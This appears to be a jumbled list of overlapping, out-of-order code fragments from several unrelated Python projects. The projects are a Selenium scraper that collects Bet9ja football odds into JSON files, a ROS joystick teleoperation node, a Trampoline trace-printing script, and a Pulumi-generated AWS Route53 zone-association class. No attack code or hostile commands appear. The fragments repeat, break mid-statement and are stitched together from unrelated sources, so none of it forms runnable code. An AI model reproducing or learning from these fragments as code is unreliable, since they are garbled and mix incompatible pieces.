"import expected_conditions as EC from selenium.webdriver.common.by import By from bs4 import BeautifulSoup import",
"# ============================================================================================================= # Bet9ja Menu def getMenu(): # Object data = {} #",
"d_odds.append(info_2) with open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile: json.dump(s_odds, outfile, indent=4) with open('./Bet9ja/bet9ja_Double.txt', 'w') as",
"# Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") # Fetch Menu for div in",
"if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG': index = i break # Activate GGNG if",
"', '') + '/' v = a['title'].lower().replace(',', '').replace(' ', '') + '/' w",
"{} f['title'] = t['title'] f['id'] = re.sub('[a-zA-Z_,]', '', t['id']) e.append(f) data[each]['submenu'] = e",
"'return document.body.scrollHeight')) for i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # Wait 5",
"target index = -1 # Get index soup = BeautifulSoup(Browser.page_source, 'html5lib') box =",
"outfile: json.dump(odds, outfile, indent=4) Browser.quit() # GGNG def GGNG(): # Odds odds =",
"'grid-table__td')) for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG': index = i",
"import ActionChains from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from",
"or 0 # Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_GGNG.txt', 'w') as outfile:",
"json import re from pathlib import Path # Browser Configurations # ============================================================================================================= BrowserMode",
"soup.select(\".accordion > .accordion-item\")[0]: upper = div.select(\".accordion-inner > .accordion-item\") for div in upper: title",
"data[each]['submenu'] = e # Save as JSON with open('./Bet9ja/bet9ja_menu.txt', 'w') as outfile: json.dump(data,",
"' + away_team info_2['match'] = home_team + ' vs ' + away_team info_1['time']",
"open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile: json.dump(s_odds, outfile, indent=4) with open('./Bet9ja/bet9ja_Double.txt', 'w') as outfile: json.dump(d_odds,",
"{} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info['category'] =",
"= each.find('span').get_text().strip() info['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['away'] = each.find_all( 'li',",
"json_file: global data data = json.load(json_file) for e in data: for a in",
"[] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global data data =",
"= len(soup.find_all('td', 'grid-table__td')) for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG': index",
"soup = BeautifulSoup(Browser.page_source, \"html5lib\") d = soup.find_all('a', 'side-nav-league__link') e = [] for t",
"if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5 seconds time.sleep(5) # Scroll",
"data data = json.load(json_file) for e in data: for a in data[e]['submenu']: u",
"Browser.find_element(By.ID, \"left_prematch_sport-1_soccer_labelmore-toggle\").click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") # Fetch Menu for",
"bet9ja = \"https://sports.bet9ja.com/\" # Functions # ============================================================================================================= # Bet9ja Menu def getMenu(): #",
"id = div.find(\"div\", \"accordion-toggle\")['id'] data[title] = {} data[title]['location'] = id # fetch Submenu",
"Compile info_1 = {} info_2 = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team",
"= {} # fetch menu with open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file: global data data",
"data = json.load(json_file) for e in data: # Initiate Browser Browser.get(data[e]) # Wait",
"break # Activate GGNG if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5",
"HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") # Fetch Menu for div in soup.select(\".accordion >",
"as outfile: json.dump(data, outfile, indent=4) Browser.quit() # Bet9ja links def getLinks_Bet9ja(): # web",
"Wait 5 seconds time.sleep(5) # Scroll the page height = int(Browser.execute_script( 'return document.body.scrollHeight'))",
"getLinks_Bet9ja(): # web prefix p = bet9ja + 'competition/soccer/' # link Object links",
"e info_1['match'] = home_team + ' vs ' + away_team info_2['match'] = home_team",
"= BeautifulSoup(Browser.page_source, \"html5lib\") # Fetch Menu for div in soup.select(\".accordion > .accordion-item\")[0]: upper",
"BrowserMode.headless = False BrowserMode.add_argument('--user-data-dir=./chrome_profile/') BrowserMode.add_argument(\"--start-maximized\") Browser = uc.Chrome(options=BrowserMode) actions = ActionChains(Browser) # Websites",
"elem = soup.select('.sports-table > .table-f') for each in elem: # Compile info_1 =",
"= t['title'] f['id'] = re.sub('[a-zA-Z_,]', '', t['id']) e.append(f) data[each]['submenu'] = e # Save",
"i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG': index = i break #",
"range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB': index = i break # Activate DNB",
"5 seconds time.sleep(5) # Scroll the page height = int(Browser.execute_script( 'return document.body.scrollHeight')) for",
"Single Chance def DS_chance(): # Odds s_odds = [] d_odds = [] #",
"Configurations # ============================================================================================================= BrowserMode = uc.ChromeOptions() BrowserMode.headless = False BrowserMode.add_argument('--user-data-dir=./chrome_profile/') BrowserMode.add_argument(\"--start-maximized\") Browser =",
"u = e.lower().replace(',', '').replace(' ', '') + '/' v = a['title'].lower().replace(',', '').replace(' ',",
"DNB def DNB(): # Odds odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt',",
"= a['title'].lower().replace(',', '').replace(' ', '') + '/' w = a['id'].lower()[1:] # full link",
"+ u + v + w # Gather links links[a['title']] = fl #",
"============================================================================================================= BrowserMode = uc.ChromeOptions() BrowserMode.headless = False BrowserMode.add_argument('--user-data-dir=./chrome_profile/') BrowserMode.add_argument(\"--start-maximized\") Browser = uc.Chrome(options=BrowserMode) actions",
"links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global data data = json.load(json_file) for e",
"in data: l = data[each]['location'] Browser.find_element(By.ID, l).click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source,",
"DNB(): # Odds odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as",
"= i break # Activate GGNG if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() #",
"Activate GGNG if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5 seconds time.sleep(5)",
"in data: # Initiate Browser Browser.get(data[e]) # Wait 5 seconds time.sleep(5) # Scroll",
"links with open('./Bet9ja/bet9ja_links.txt', 'w') as outfile: json.dump(links, outfile, indent=4) Browser.quit() # Bet9ja Odds",
"f['title'] = t['title'] f['id'] = re.sub('[a-zA-Z_,]', '', t['id']) e.append(f) data[each]['submenu'] = e #",
"with open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file: global data data = json.load(json_file) for e in",
"= json.load(json_file) for e in data: # Initiate Browser Browser.get(data[e]) # Wait 5",
"'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit() # Double Chance and Single Chance",
"in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # # Wait 5 seconds time.sleep(5) #",
"i break # Activate DNB if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait",
"range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG': index = i break # Activate GGNG",
"# Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") elem = soup.select('.sports-table > .table-f') for",
"= each.find( 'div', 'sports-table__away').get_text().strip() info['category'] = e info['match'] = home_team + ' vs"
] |
[
"#!/usr/bin/env python import rospy from geometry_msgs.msg import Twist from sensor_msgs.msg import Joy toggle",
"import rospy from geometry_msgs.msg import Twist from sensor_msgs.msg import Joy toggle = False",
"twist.linear.x = 0 twist.linear.y = 0 twist.angular.z = 0 pub.publish(twist) toggle = False",
"to \"turtle1/cmd_vel\" to control turtle1 global pub pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10) #",
"everything def start(): # publishing to \"turtle1/cmd_vel\" to control turtle1 global pub pub",
"control turtle1 global pub pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10) # subscribed to joystick",
"Intializes everything def start(): # publishing to \"turtle1/cmd_vel\" to control turtle1 global pub",
"rospy from geometry_msgs.msg import Twist from sensor_msgs.msg import Joy toggle = False def",
"import Joy toggle = False def callback(data): global toggle twist = Twist() twist.linear.x",
"0 pub.publish(twist) toggle = False # Intializes everything def start(): # publishing to",
"= Twist() twist.linear.x = 1.5*data.axes[1] twist.linear.y = -1.5*data.axes[0] twist.angular.z = 1.5*data.axes[3] if(data.buttons[4] ==",
"Twist from sensor_msgs.msg import Joy toggle = False def callback(data): global toggle twist",
"1): toggle = True pub.publish(twist) elif(toggle == True): twist.linear.x = 0 twist.linear.y =",
"pub.publish(twist) elif(toggle == True): twist.linear.x = 0 twist.linear.y = 0 twist.angular.z = 0",
"1.5*data.axes[3] if(data.buttons[4] == 1): toggle = True pub.publish(twist) elif(toggle == True): twist.linear.x =",
"= -1.5*data.axes[0] twist.angular.z = 1.5*data.axes[3] if(data.buttons[4] == 1): toggle = True pub.publish(twist) elif(toggle",
"False def callback(data): global toggle twist = Twist() twist.linear.x = 1.5*data.axes[1] twist.linear.y =",
"= 1.5*data.axes[1] twist.linear.y = -1.5*data.axes[0] twist.angular.z = 1.5*data.axes[3] if(data.buttons[4] == 1): toggle =",
"subscribed to joystick inputs on topic \"joy\" rospy.Subscriber(\"joy\", Joy, callback) # starts the",
"from geometry_msgs.msg import Twist from sensor_msgs.msg import Joy toggle = False def callback(data):",
"\"turtle1/cmd_vel\" to control turtle1 global pub pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10) # subscribed",
"to joystick inputs on topic \"joy\" rospy.Subscriber(\"joy\", Joy, callback) # starts the node",
"import Twist from sensor_msgs.msg import Joy toggle = False def callback(data): global toggle",
"pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10) # subscribed to joystick inputs on topic \"joy\"",
"= False # Intializes everything def start(): # publishing to \"turtle1/cmd_vel\" to control",
"toggle = False def callback(data): global toggle twist = Twist() twist.linear.x = 1.5*data.axes[1]",
"= 0 twist.linear.y = 0 twist.angular.z = 0 pub.publish(twist) toggle = False #",
"Twist, queue_size=10) # subscribed to joystick inputs on topic \"joy\" rospy.Subscriber(\"joy\", Joy, callback)",
"def callback(data): global toggle twist = Twist() twist.linear.x = 1.5*data.axes[1] twist.linear.y = -1.5*data.axes[0]",
"callback(data): global toggle twist = Twist() twist.linear.x = 1.5*data.axes[1] twist.linear.y = -1.5*data.axes[0] twist.angular.z",
"to control turtle1 global pub pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10) # subscribed to",
"== 1): toggle = True pub.publish(twist) elif(toggle == True): twist.linear.x = 0 twist.linear.y",
"True pub.publish(twist) elif(toggle == True): twist.linear.x = 0 twist.linear.y = 0 twist.angular.z =",
"# subscribed to joystick inputs on topic \"joy\" rospy.Subscriber(\"joy\", Joy, callback) # starts",
"rospy.Subscriber(\"joy\", Joy, callback) # starts the node rospy.init_node('Xbox360Joy') rospy.spin() if __name__ == '__main__':",
"twist.linear.y = 0 twist.angular.z = 0 pub.publish(twist) toggle = False # Intializes everything",
"turtle1 global pub pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10) # subscribed to joystick inputs",
"publishing to \"turtle1/cmd_vel\" to control turtle1 global pub pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10)",
"global toggle twist = Twist() twist.linear.x = 1.5*data.axes[1] twist.linear.y = -1.5*data.axes[0] twist.angular.z =",
"inputs on topic \"joy\" rospy.Subscriber(\"joy\", Joy, callback) # starts the node rospy.init_node('Xbox360Joy') rospy.spin()",
"toggle = True pub.publish(twist) elif(toggle == True): twist.linear.x = 0 twist.linear.y = 0",
"\"joy\" rospy.Subscriber(\"joy\", Joy, callback) # starts the node rospy.init_node('Xbox360Joy') rospy.spin() if __name__ ==",
"twist.angular.z = 0 pub.publish(twist) toggle = False # Intializes everything def start(): #",
"Twist() twist.linear.x = 1.5*data.axes[1] twist.linear.y = -1.5*data.axes[0] twist.angular.z = 1.5*data.axes[3] if(data.buttons[4] == 1):",
"global pub pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10) # subscribed to joystick inputs on",
"geometry_msgs.msg import Twist from sensor_msgs.msg import Joy toggle = False def callback(data): global",
"elif(toggle == True): twist.linear.x = 0 twist.linear.y = 0 twist.angular.z = 0 pub.publish(twist)",
"pub.publish(twist) toggle = False # Intializes everything def start(): # publishing to \"turtle1/cmd_vel\"",
"twist = Twist() twist.linear.x = 1.5*data.axes[1] twist.linear.y = -1.5*data.axes[0] twist.angular.z = 1.5*data.axes[3] if(data.buttons[4]",
"= 1.5*data.axes[3] if(data.buttons[4] == 1): toggle = True pub.publish(twist) elif(toggle == True): twist.linear.x",
"twist.linear.y = -1.5*data.axes[0] twist.angular.z = 1.5*data.axes[3] if(data.buttons[4] == 1): toggle = True pub.publish(twist)",
"pub pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10) # subscribed to joystick inputs on topic",
"sensor_msgs.msg import Joy toggle = False def callback(data): global toggle twist = Twist()",
"toggle = False # Intializes everything def start(): # publishing to \"turtle1/cmd_vel\" to",
"rospy.Publisher('/cmd_vel', Twist, queue_size=10) # subscribed to joystick inputs on topic \"joy\" rospy.Subscriber(\"joy\", Joy,",
"= False def callback(data): global toggle twist = Twist() twist.linear.x = 1.5*data.axes[1] twist.linear.y",
"== True): twist.linear.x = 0 twist.linear.y = 0 twist.angular.z = 0 pub.publish(twist) toggle",
"joystick inputs on topic \"joy\" rospy.Subscriber(\"joy\", Joy, callback) # starts the node rospy.init_node('Xbox360Joy')",
"start(): # publishing to \"turtle1/cmd_vel\" to control turtle1 global pub pub = rospy.Publisher('/cmd_vel',",
"Joy, callback) # starts the node rospy.init_node('Xbox360Joy') rospy.spin() if __name__ == '__main__': start()",
"on topic \"joy\" rospy.Subscriber(\"joy\", Joy, callback) # starts the node rospy.init_node('Xbox360Joy') rospy.spin() if",
"python import rospy from geometry_msgs.msg import Twist from sensor_msgs.msg import Joy toggle =",
"-1.5*data.axes[0] twist.angular.z = 1.5*data.axes[3] if(data.buttons[4] == 1): toggle = True pub.publish(twist) elif(toggle ==",
"1.5*data.axes[1] twist.linear.y = -1.5*data.axes[0] twist.angular.z = 1.5*data.axes[3] if(data.buttons[4] == 1): toggle = True",
"0 twist.angular.z = 0 pub.publish(twist) toggle = False # Intializes everything def start():",
"toggle twist = Twist() twist.linear.x = 1.5*data.axes[1] twist.linear.y = -1.5*data.axes[0] twist.angular.z = 1.5*data.axes[3]",
"twist.angular.z = 1.5*data.axes[3] if(data.buttons[4] == 1): toggle = True pub.publish(twist) elif(toggle == True):",
"= True pub.publish(twist) elif(toggle == True): twist.linear.x = 0 twist.linear.y = 0 twist.angular.z",
"# Intializes everything def start(): # publishing to \"turtle1/cmd_vel\" to control turtle1 global",
"twist.linear.x = 1.5*data.axes[1] twist.linear.y = -1.5*data.axes[0] twist.angular.z = 1.5*data.axes[3] if(data.buttons[4] == 1): toggle",
"True): twist.linear.x = 0 twist.linear.y = 0 twist.angular.z = 0 pub.publish(twist) toggle =",
"0 twist.linear.y = 0 twist.angular.z = 0 pub.publish(twist) toggle = False # Intializes",
"def start(): # publishing to \"turtle1/cmd_vel\" to control turtle1 global pub pub =",
"from sensor_msgs.msg import Joy toggle = False def callback(data): global toggle twist =",
"if(data.buttons[4] == 1): toggle = True pub.publish(twist) elif(toggle == True): twist.linear.x = 0",
"= 0 pub.publish(twist) toggle = False # Intializes everything def start(): # publishing",
"Joy toggle = False def callback(data): global toggle twist = Twist() twist.linear.x =",
"queue_size=10) # subscribed to joystick inputs on topic \"joy\" rospy.Subscriber(\"joy\", Joy, callback) #",
"= 0 twist.angular.z = 0 pub.publish(twist) toggle = False # Intializes everything def",
"topic \"joy\" rospy.Subscriber(\"joy\", Joy, callback) # starts the node rospy.init_node('Xbox360Joy') rospy.spin() if __name__",
"= rospy.Publisher('/cmd_vel', Twist, queue_size=10) # subscribed to joystick inputs on topic \"joy\" rospy.Subscriber(\"joy\",",
"False # Intializes everything def start(): # publishing to \"turtle1/cmd_vel\" to control turtle1",
"# publishing to \"turtle1/cmd_vel\" to control turtle1 global pub pub = rospy.Publisher('/cmd_vel', Twist,"
] |
[
"<reponame>master-coro/gantt-trampoline import sys from os import path sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) )",
") ) ) from lib.Tasks import TraceGenerator import argparse parser = argparse.ArgumentParser(description=\"Print trace",
"sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) ) from lib.Tasks import TraceGenerator import argparse",
"help=\"Register the path to the trace json file\") parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help=\"Register the",
"tpl static info json file\") args = parser.parse_args() generator = TraceGenerator(args.tpl_path, args.trace_path) generator.printTrace()",
"to the tpl static info json file\") args = parser.parse_args() generator = TraceGenerator(args.tpl_path,",
"path sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) ) from lib.Tasks import TraceGenerator import",
"import TraceGenerator import argparse parser = argparse.ArgumentParser(description=\"Print trace from a Trampoline application.\") parser.add_argument('--trace_path',",
"os import path sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) ) from lib.Tasks import",
"default='data/trace.json', help=\"Register the path to the trace json file\") parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help=\"Register",
"path to the tpl static info json file\") args = parser.parse_args() generator =",
"a Trampoline application.\") parser.add_argument('--trace_path', type=str, default='data/trace.json', help=\"Register the path to the trace json",
"from lib.Tasks import TraceGenerator import argparse parser = argparse.ArgumentParser(description=\"Print trace from a Trampoline",
"path to the trace json file\") parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help=\"Register the path to",
"argparse parser = argparse.ArgumentParser(description=\"Print trace from a Trampoline application.\") parser.add_argument('--trace_path', type=str, default='data/trace.json', help=\"Register",
"from a Trampoline application.\") parser.add_argument('--trace_path', type=str, default='data/trace.json', help=\"Register the path to the trace",
"the path to the tpl static info json file\") args = parser.parse_args() generator",
"the trace json file\") parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help=\"Register the path to the tpl",
"import sys from os import path sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) )",
"the tpl static info json file\") args = parser.parse_args() generator = TraceGenerator(args.tpl_path, args.trace_path)",
"sys from os import path sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) ) from",
") ) from lib.Tasks import TraceGenerator import argparse parser = argparse.ArgumentParser(description=\"Print trace from",
"parser = argparse.ArgumentParser(description=\"Print trace from a Trampoline application.\") parser.add_argument('--trace_path', type=str, default='data/trace.json', help=\"Register the",
"parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help=\"Register the path to the tpl static info json file\")",
"help=\"Register the path to the tpl static info json file\") args = parser.parse_args()",
"file\") parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help=\"Register the path to the tpl static info json",
"trace json file\") parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help=\"Register the path to the tpl static",
"path.dirname( path.abspath(__file__) ) ) ) from lib.Tasks import TraceGenerator import argparse parser =",
"path.abspath(__file__) ) ) ) from lib.Tasks import TraceGenerator import argparse parser = argparse.ArgumentParser(description=\"Print",
"trace from a Trampoline application.\") parser.add_argument('--trace_path', type=str, default='data/trace.json', help=\"Register the path to the",
"the path to the trace json file\") parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help=\"Register the path",
"application.\") parser.add_argument('--trace_path', type=str, default='data/trace.json', help=\"Register the path to the trace json file\") parser.add_argument('--tpl_path',",
"from os import path sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) ) from lib.Tasks",
") from lib.Tasks import TraceGenerator import argparse parser = argparse.ArgumentParser(description=\"Print trace from a",
"import argparse parser = argparse.ArgumentParser(description=\"Print trace from a Trampoline application.\") parser.add_argument('--trace_path', type=str, default='data/trace.json',",
"= argparse.ArgumentParser(description=\"Print trace from a Trampoline application.\") parser.add_argument('--trace_path', type=str, default='data/trace.json', help=\"Register the path",
"type=str, default='data/trace.json', help=\"Register the path to the trace json file\") parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json',",
"to the trace json file\") parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help=\"Register the path to the",
"argparse.ArgumentParser(description=\"Print trace from a Trampoline application.\") parser.add_argument('--trace_path', type=str, default='data/trace.json', help=\"Register the path to",
"Trampoline application.\") parser.add_argument('--trace_path', type=str, default='data/trace.json', help=\"Register the path to the trace json file\")",
"TraceGenerator import argparse parser = argparse.ArgumentParser(description=\"Print trace from a Trampoline application.\") parser.add_argument('--trace_path', type=str,",
"default='data/tpl_static_info.json', help=\"Register the path to the tpl static info json file\") args =",
"type=str, default='data/tpl_static_info.json', help=\"Register the path to the tpl static info json file\") args",
"lib.Tasks import TraceGenerator import argparse parser = argparse.ArgumentParser(description=\"Print trace from a Trampoline application.\")",
"path.dirname( path.dirname( path.abspath(__file__) ) ) ) from lib.Tasks import TraceGenerator import argparse parser",
"import path sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) ) from lib.Tasks import TraceGenerator",
"parser.add_argument('--trace_path', type=str, default='data/trace.json', help=\"Register the path to the trace json file\") parser.add_argument('--tpl_path', type=str,",
"json file\") parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help=\"Register the path to the tpl static info"
] |
[
"not edit by hand unless you're certain you know what you are doing!",
"not isinstance(resource_name, str): raise TypeError('Expected resource name to be a string') if opts",
"of __name__ is deprecated\", DeprecationWarning) resource_name = __name__ if __opts__ is not None:",
"you are doing! *** import json import warnings import pulumi import pulumi.runtime from",
"to associate with the private hosted zone. \"\"\" vpc_region: pulumi.Output[str] \"\"\" The VPC's",
"deprecated\", DeprecationWarning) resource_name = __name__ if __opts__ is not None: warnings.warn(\"explicit use of",
"__opts__ is deprecated, use 'opts' instead\", DeprecationWarning) opts = __opts__ if not resource_name:",
"str): raise TypeError('Expected resource name to be a string') if opts and not",
"pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') __props__ = dict()",
"pulumi.Input[str] zone_id: The private hosted zone to associate. \"\"\" if __name__ is not",
"__name__ is not None: warnings.warn(\"explicit use of __name__ is deprecated\", DeprecationWarning) resource_name =",
"is not None: warnings.warn(\"explicit use of __opts__ is deprecated, use 'opts' instead\", DeprecationWarning)",
"*** # *** Do not edit by hand unless you're certain you know",
"explicit association ordering is required (e.g. a separate cross-account association authorization), usage of",
"to be a ResourceOptions instance') __props__ = dict() if vpc_id is None: raise",
"zone. \"\"\" vpc_region: pulumi.Output[str] \"\"\" The VPC's region. Defaults to the region of",
"and not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance')",
"'zone_id'\") __props__['zone_id'] = zone_id super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__, opts) def translate_output_property(self, prop):",
"resource_name, opts=None, vpc_id=None, vpc_region=None, zone_id=None, __name__=None, __opts__=None): \"\"\" Manages a Route53 Hosted Zone",
"property 'zone_id'\") __props__['zone_id'] = zone_id super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__, opts) def translate_output_property(self,",
"to the region of the AWS provider. \"\"\" zone_id: pulumi.Output[str] \"\"\" The private",
"def translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop): return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or",
"[lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in the `aws_route53_zone` resource to manage additional associations",
"string') if opts and not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be",
"None: warnings.warn(\"explicit use of __name__ is deprecated\", DeprecationWarning) resource_name = __name__ if __opts__",
"optionally use the generic Terraform resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in the",
"pulumi.Output[str] \"\"\" The VPC to associate with the private hosted zone. \"\"\" vpc_region:",
"[`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration blocks. At this time, you cannot use those",
"of the AWS provider. \"\"\" zone_id: pulumi.Output[str] \"\"\" The private hosted zone to",
"vpc_id: pulumi.Output[str] \"\"\" The VPC to associate with the private hosted zone. \"\"\"",
"ID otherwise it will cause a perpetual difference in plan output. You can",
"region. Defaults to the region of the AWS provider. :param pulumi.Input[str] zone_id: The",
"standalone Zone VPC Association resource and exclusive VPC associations defined in-line in the",
"pulumi import pulumi.runtime from .. import utilities, tables class ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str] \"\"\"",
"\"\"\" def __init__(__self__, resource_name, opts=None, vpc_id=None, vpc_region=None, zone_id=None, __name__=None, __opts__=None): \"\"\" Manages a",
"vpc_id: The VPC to associate with the private hosted zone. :param pulumi.Input[str] vpc_region:",
"(tfgen) Tool. *** # *** Do not edit by hand unless you're certain",
"pulumi.Output[str] \"\"\" The VPC's region. Defaults to the region of the AWS provider.",
"= __opts__ if not resource_name: raise TypeError('Missing resource name argument (for URN creation)')",
"name argument (for URN creation)') if not isinstance(resource_name, str): raise TypeError('Expected resource name",
"__init__(__self__, resource_name, opts=None, vpc_id=None, vpc_region=None, zone_id=None, __name__=None, __opts__=None): \"\"\" Manages a Route53 Hosted",
"vpc_region if zone_id is None: raise TypeError(\"Missing required property 'zone_id'\") __props__['zone_id'] = zone_id",
"use the generic Terraform resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in the `aws_route53_zone`",
"in conjunction with this resource and the same zone ID otherwise it will",
"# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen)",
"be made on private zones. > **NOTE:** Unless explicit association ordering is required",
"At this time, you cannot use those in-line VPC associations in conjunction with",
"this resource is not recommended. Use the `vpc` configuration blocks available within the",
"the generic Terraform resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in the `aws_route53_zone` resource",
"can only be made on private zones. > **NOTE:** Unless explicit association ordering",
"**NOTE:** Terraform provides both this standalone Zone VPC Association resource and exclusive VPC",
"vpc_region=None, zone_id=None, __name__=None, __opts__=None): \"\"\" Manages a Route53 Hosted Zone VPC association. VPC",
"pulumi.Input[str] vpc_id: The VPC to associate with the private hosted zone. :param pulumi.Input[str]",
"pulumi.Output[str] \"\"\" The private hosted zone to associate. \"\"\" def __init__(__self__, resource_name, opts=None,",
"Association resource and exclusive VPC associations defined in-line in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via",
"from .. import utilities, tables class ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str] \"\"\" The VPC to",
"vpc_region: pulumi.Output[str] \"\"\" The VPC's region. Defaults to the region of the AWS",
"a Route53 Hosted Zone VPC association. VPC associations can only be made on",
"difference in plan output. You can optionally use the generic Terraform resource [lifecycle",
"this resource and the same zone ID otherwise it will cause a perpetual",
"\"\"\" zone_id: pulumi.Output[str] \"\"\" The private hosted zone to associate. \"\"\" def __init__(__self__,",
"__props__, opts) def translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop): return",
"the private hosted zone. \"\"\" vpc_region: pulumi.Output[str] \"\"\" The VPC's region. Defaults to",
"certain you know what you are doing! *** import json import warnings import",
"usage of this resource is not recommended. Use the `vpc` configuration blocks available",
"resource. :param pulumi.Input[str] vpc_id: The VPC to associate with the private hosted zone.",
"zone_id=None, __name__=None, __opts__=None): \"\"\" Manages a Route53 Hosted Zone VPC association. VPC associations",
"cannot use those in-line VPC associations in conjunction with this resource and the",
"hosted zone to associate. \"\"\" def __init__(__self__, resource_name, opts=None, vpc_id=None, vpc_region=None, zone_id=None, __name__=None,",
"resource_name: raise TypeError('Missing resource name argument (for URN creation)') if not isinstance(resource_name, str):",
"property 'vpc_id'\") __props__['vpc_id'] = vpc_id __props__['vpc_region'] = vpc_region if zone_id is None: raise",
"to manage additional associations via this resource. :param str resource_name: The name of",
"authorization), usage of this resource is not recommended. Use the `vpc` configuration blocks",
"of this resource is not recommended. Use the `vpc` configuration blocks available within",
"in-line VPC associations in conjunction with this resource and the same zone ID",
"argument (for URN creation)') if not isinstance(resource_name, str): raise TypeError('Expected resource name to",
"manage additional associations via this resource. :param str resource_name: The name of the",
"__name__=None, __opts__=None): \"\"\" Manages a Route53 Hosted Zone VPC association. VPC associations can",
"the resource. :param pulumi.Input[str] vpc_id: The VPC to associate with the private hosted",
"if not resource_name: raise TypeError('Missing resource name argument (for URN creation)') if not",
"= vpc_id __props__['vpc_region'] = vpc_region if zone_id is None: raise TypeError(\"Missing required property",
"resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration blocks. At this time, you cannot use those in-line",
"Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless",
"\"\"\" The private hosted zone to associate. \"\"\" def __init__(__self__, resource_name, opts=None, vpc_id=None,",
"you're certain you know what you are doing! *** import json import warnings",
"zone_id is None: raise TypeError(\"Missing required property 'zone_id'\") __props__['zone_id'] = zone_id super(ZoneAssociation, __self__).__init__(",
"raise TypeError('Expected resource options to be a ResourceOptions instance') __props__ = dict() if",
"associate with the private hosted zone. \"\"\" vpc_region: pulumi.Output[str] \"\"\" The VPC's region.",
